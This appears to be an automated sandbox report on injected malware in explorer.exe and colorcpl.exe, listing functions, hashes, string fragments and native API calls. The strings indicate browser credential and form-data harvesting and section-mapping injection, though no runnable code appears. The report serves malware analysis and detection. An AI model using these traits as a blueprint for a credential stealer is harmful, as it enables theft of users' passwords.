Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: a7347054ffb6a7dbd5cde54cee66d8b2a18fdcd5b90c92692e1d8e229335f3c1
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 81E16EB4618F488FC765DF68C4857AAB7E0FF58301F804A2EA59BCB245DF34A501CB55

Function 10D2F792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

encr, xrefs: 10D2F8D2
Fiel, xrefs: 10D2F884
form, xrefs: 10D2F84D
swor, xrefs: 10D2F8EA
name, xrefs: 10D2F87D
ypte, xrefs: 10D2F8DA
guid, xrefs: 10D2F7CE
ypte, xrefs: 10D2F8A5
dUse, xrefs: 10D2F8AD
user, xrefs: 10D2F876
d, xrefs: 10D2F8F2
rnam, xrefs: 10D2F8B5
Subm, xrefs: 10D2F855
dPas, xrefs: 10D2F8E2
encr, xrefs: 10D2F89D
e, xrefs: 10D2F8BD
itUR, xrefs: 10D2F85D

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 6d7d0c5196f05ff9dac592e630e9722991f30bfe25533325d623ed16c20fa999
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 3DB18D70518B488EDB69DF68C485AEEB7F1FF98300F50451EE49ACB251DF70A4058B95

Function 10D2D622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

c, xrefs: 10D2D697
w, xrefs: 10D2D6B3
n, xrefs: 10D2D6C1
n, xrefs: 10D2D6BA
l, xrefs: 10D2D6AC
l, xrefs: 10D2D6D6
u, xrefs: 10D2D661
l, xrefs: 10D2D682
p, xrefs: 10D2D690
e, xrefs: 10D2D66D
d, xrefs: 10D2D6CF
d, xrefs: 10D2D67B
t, xrefs: 10D2D6C8
d, xrefs: 10D2D6A5
s, xrefs: 10D2D689
i, xrefs: 10D2D69E
2, xrefs: 10D2D674

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 7049d908588ca598a07f56c3e68e77383fdce10690a4735bc695fe13d99a6b0c
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: F541B170A18B088FDB14EF88A4467BD7BE2FB48708F40426EE409D3245DBB5AD45CBD6

Function 10D34AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

n, xrefs: 10D34C98
[, xrefs: 10D34CCD
c, xrefs: 10D34C0B
], xrefs: 10D34CA8
[, xrefs: 10D34C66
e, xrefs: 10D34CA0
[, xrefs: 10D34C2D
], xrefs: 10D34C3D
l, xrefs: 10D34C35
[, xrefs: 10D34BF6
l, xrefs: 10D34CE2
[, xrefs: 10D34C90
D, xrefs: 10D34CDA
b, xrefs: 10D34C73

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 305aa5ab50d14253f1e136f11d275dee0d474f9c317f003eca520ab839b3b638
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: F7C16DB4618B098FC758EF28D48669AF3E1FB94305F40472EA49ACB250DF34B915CB96

Function 10D34F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 10D34FB0
r, xrefs: 10D34FB8
n, xrefs: 10D34F6B
r, xrefs: 10D34F98
r, xrefs: 10D34FC0
r, xrefs: 10D34F88
r, xrefs: 10D34FA0
0, xrefs: 10D34F5B
., xrefs: 10D34F63
c, xrefs: 10D34FC8
r, xrefs: 10D34F90
r, xrefs: 10D34FA8

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: cf3364c85969a5e42a388a92b9e5e472869e33d1d84b334011170df5f35ae665
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 2E51D67561C7488FD749CF18D4812AAB7E5FBC5701F501A2EE8CBCB245DBB4A906CB82

Function 10D2E2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dll, xrefs: 10D2E32E
opera_browser.dll, xrefs: 10D2E629
dragon_s.dll, xrefs: 10D2E614
4.dl, xrefs: 10D2E4DB
cli., xrefs: 10D2E327
l, xrefs: 10D2E4E2
sspi, xrefs: 10D2E320
nspr, xrefs: 10D2E4D4

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 10f07ccaa00fc59276566c47b92f202ad9913e571fa1ac5d5ad4a30d61258221
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: B1C1A374618E198FC758EF68D496AAAF3E1FF98305F854329944ACB290DF30E901CBD5

Function 10D2E2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dll, xrefs: 10D2E32E
opera_browser.dll, xrefs: 10D2E629
dragon_s.dll, xrefs: 10D2E614
4.dl, xrefs: 10D2E4DB
cli., xrefs: 10D2E327
l, xrefs: 10D2E4E2
sspi, xrefs: 10D2E320
nspr, xrefs: 10D2E4D4

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 57eb02a6c2e5ae4d1fecfe0082d3c0480beecf93554098e8a64d2fc998bb7000
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: E6C1B474618E194FC758EF68D4966A9F3E1FF98305F854329944ACB290DF30E901CBD5

Function 10D2FCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

word, xrefs: 10D2FD9E
2, xrefs: 10D2FDE1
Pass, xrefs: 10D2FD97
L: , xrefs: 10D2FD66
name, xrefs: 10D2FDB2
UR, xrefs: 10D2FD5F
User, xrefs: 10D2FDAB

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: b3ca080ed13e5c24a174421fb425e28c3331d0333591f03b334f8f04d9e5799a
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: A9A1BF70618B488BDB18DFA8D444BEEB7E1FF88305F40462DE48ADB291EF709945C789

Function 10D2FCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

word, xrefs: 10D2FD9E
2, xrefs: 10D2FDE1
Pass, xrefs: 10D2FD97
L: , xrefs: 10D2FD66
name, xrefs: 10D2FDB2
UR, xrefs: 10D2FD5F
User, xrefs: 10D2FDAB

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 01c282773ea1b36bccd1a97105f02fa7b50e40b3ae7fdb0ab37cdd3beb646086
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 52918E70618B488BDB18DFA8D444BEEB7E1FF88305F40462DE48ADB291EB7095458B85

Function 10D2F352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

, xrefs: 10D2F47C
v, xrefs: 10D2F4A0
e, xrefs: 10D2F48E
., xrefs: 10D2F3B0
n, xrefs: 10D2F3E7

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 4b03e7417a6c0125d9a4dd52cf5875b3d76f552c14c58a46eea2a9c601953fe7
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 2371D071608B488FD758DFA8D4857AAB3F0FF98305F40063EE44ACB261EB71E9458B85

Function 10D2AC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

shel, xrefs: 10D2AC90
l32., xrefs: 10D2AC97
2.dl, xrefs: 10D2AC64
ole3, xrefs: 10D2AC5D
dll, xrefs: 10D2AC9E

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 73dffea2e585c37444e3bd4d21350027bf1b864288550c2c17e8e5691f44d0e9
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: A4516BB0918B4C8FDB54DFA4D045AEEB7F1FF18301F40462EA49AEB254EF30A5418B99

Function 10D2B86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

dll, xrefs: 10D2B8F4
ion., xrefs: 10D2B8EC
vers, xrefs: 10D2B8E4
4, xrefs: 10D2B9E9
\, xrefs: 10D2B9E0

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: e16096aa72c67479ea2ec1883a791dfc2ef324b148f50e68c8f96fdf255cb2aa
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: E6418434228B4C8FCBA5DF24D8457EAB3E4FB98315F51462E989EC7240EF70E9058792

Function 10D2D4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

cli., xrefs: 10D2D515
32.d, xrefs: 10D2D4DA
sspi, xrefs: 10D2D50E
user, xrefs: 10D2D4D3
dll, xrefs: 10D2D51C

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 52c21df8cbb5cdb47bd8c95d6388107c9843b4dc7d842ec43338e466c8464346
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 20418C70A18E0D8FCB84EF6890953AD73E1FB59309F85416AA80EDB340DEB0D9408B86

Function 10D2B432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

el32, xrefs: 10D2B537
h, xrefs: 10D2B51F
kern, xrefs: 10D2B52A
.dll, xrefs: 10D2B53F

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: c238c3444676ab6ad44889cc1fd65738e155fcd71c6e3d5fcb7df3f195be761b
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 4D41C170A08B4D8FD7A8DF2890843AAB7E1FBA8314F544A2F949EC7255DF70D945CB81

Function 10D320B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

Snif, xrefs: 10D32154
, xrefs: 10D32184
f fr, xrefs: 10D3213D
om:, xrefs: 10D32146

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 0b8eb6b65e463a979226d72fb74fa95ae1109baa87835990552d45faa20660eb
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 1F3105B550CB886FC71ADB28C0856EAB7D0FB84300F50491EE49BCB295EE34A549CB43

Function 10D320C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

Snif, xrefs: 10D32154
, xrefs: 10D32184
f fr, xrefs: 10D3213D
om:, xrefs: 10D32146

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 5f8fd6810ed46b1118697ec43fe7822016274817084940dcab5efc432483c5be
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 5D31F2B5508B486FD76ADB28C4856EAB7D4FB94300F40491EE49BCB295EE30E506CA43

Function 10D2DFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

.dll, xrefs: 10D2DFFE
hild, xrefs: 10D2DFF6
me_c, xrefs: 10D2DFEE
chro, xrefs: 10D2E023

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 77b22e6cd96b72b979039a77d01aead3e3a84e527a6ec71c1c34c8edf209be95
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 85319074118B084FC784DF689495BAAB7E1FB98301FC5553DA44ACB294DF30D905CB62

Function 10D2DFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

.dll, xrefs: 10D2DFFE
hild, xrefs: 10D2DFF6
me_c, xrefs: 10D2DFEE
chro, xrefs: 10D2E023

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: b1312e31ab74149379e0d2e2a4cbde5843c6f7fefe185bbf87464b84e37808e6
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 4831AD70218B088FC784DF689495BAAB7E1FF98301F85563DA44ACB294DF30D905CBA2

Function 10D308C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

nt: , xrefs: 10D3091E
on.d, xrefs: 10D30902
urlmon.dll, xrefs: 10D30959
User-Agent: , xrefs: 10D30935, 10D30948

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 6bd718b0a5f4d29cccc4e1b2b8ef88a483b45992e0600eb1bc84e5470455e1a6
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 8631D171614A0C8FCB45EFA8C8857EDBBE0FB58215F40422AE44EDB280DE789645CB99

Function 10D308BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

nt: , xrefs: 10D3091E
on.d, xrefs: 10D30902
urlmon.dll, xrefs: 10D30959
User-Agent: , xrefs: 10D30935, 10D30948

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: e798a7ce9c8e9bcdcc4a2466b1886035a1411d42cba1a3a6f70c7b88d8bcfa60
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: DA2106B0610A4C8FCB05DFA8C8457ED7BF0FF58215F40422AE45ADB280DF749604CBA9

Function 10D31E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 10D31F26
., xrefs: 10D31F1F
t, xrefs: 10D31EF4
l, xrefs: 10D31F03

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: ad3a4630106d556fee91601dcef2859fa39a8d18cfefc39a5bb63182908e63c3
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 0321ADB4A24E0E9FDB48EFA8D0447ADBAF0FF18311F50462EE009E7640DB74A581CB94

Function 10D31E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 10D31F26
., xrefs: 10D31F1F
t, xrefs: 10D31EF4
l, xrefs: 10D31F03

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 2e1b94306d2b488c4fc830a9a69698d487c372dbac974594d0ad5d2676609ab7
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 61219CB4A24E0D9BDB18EFA8D0457E9BBF0FF08311F50462DE009E7640DB74A5818B94

Function 10D31FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

pass, xrefs: 10D32022
auth, xrefs: 10D3202F
logi, xrefs: 10D3203C
user, xrefs: 10D32015

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: d593b78aaf1509edb9dde591c69be91393d8926173c0f0fbe9ab09e43764aa79
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: BF21CDB0614B0D8BCB45CF9998816EEB7E1FF88344F054619E40AEB244D7B0E915CBD6

Analysis Process: colorcpl.exePID: 3944, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	6.6%
Signature Coverage:	0%
Total number of Nodes:	633
Total number of Limit Nodes:	82

Executed Functions

Function 0476A036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 0476A19F

Strings

0, xrefs: 0476A227

Memory Dump Source

Source File: 00000005.00000002.4551472869.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4760000_colorcpl.jbxd

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
Instruction ID: a7dc163b2de785cf92c9a52675917680b32646c98afa49c0a6d92ddc9a2a5c24
Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
Instruction Fuzzy Hash: 40F14270928A4C8FDB69EF68C898AEE77E1FF99304F40462AD84BD7250DF34A545CB41

Function 04769BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 04769C93
NtMapViewOfSection.NTDLL ref: 04769CFF
NtClose.NTDLL ref: 04769DC5

Strings

@, xrefs: 04769D0C
@, xrefs: 04769C8B

Memory Dump Source

Source File: 00000005.00000002.4551472869.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4760000_colorcpl.jbxd

Similarity

API ID: Section$CloseCreateView
String ID: @$@
API String ID: 1133238012-149943524
Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
Instruction ID: 22e45dfe3fc603aa49d5a144e797c902b9d5d7bd54164490875fd5330a6d58f8
Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
Instruction Fuzzy Hash: AF6194B0118B088FCB58DF58D8856AABBE1FF98314F50062EE98BC3251DF35E441CB46

Function 04769BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 04769C93
NtMapViewOfSection.NTDLL ref: 04769CFF

Strings

@, xrefs: 04769D0C
@, xrefs: 04769C8B

Memory Dump Source

Source File: 00000005.00000002.4551472869.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4760000_colorcpl.jbxd

Similarity

API ID: Section$CreateView
String ID: @$@
API String ID: 1585966358-149943524
Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
Instruction ID: a0a7cf9079720a19fb5395fa9250bf335ab933fbc4da713d4f9007938abad229
Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
Instruction Fuzzy Hash: BB5170B0518B088FD758DF18D8956AABBE1FB88314F50062EE98AD3651DF35E441CB86

Function 0288A34A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02884BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02884BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0288A39D

Strings

t8U-, xrefs: 0288A34A
.z`, xrefs: 0288A38D, 0288A398

Memory Dump Source

Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`$t8U-
API String ID: 823142352-2974142577
Opcode ID: 06ce2941d002046ee9495b8d1b776df103e8e31f9be89660521317f8a214df82
Instruction ID: f43ac4e70842dca45b76583c6c735f6ba06a28ef57360c1f587988657b90e5dd
Opcode Fuzzy Hash: 06ce2941d002046ee9495b8d1b776df103e8e31f9be89660521317f8a214df82
Instruction Fuzzy Hash: 99F0B2B6201108AFDB08CF89DC94EEB77A9AF8C754F158649FA1DA7240C630E811CBA4

Function 0476A042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 0476A19F

Strings

0, xrefs: 0476A0CD

Memory Dump Source

Source File: 00000005.00000002.4551472869.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false

Joe Sandbox IDA Plugin

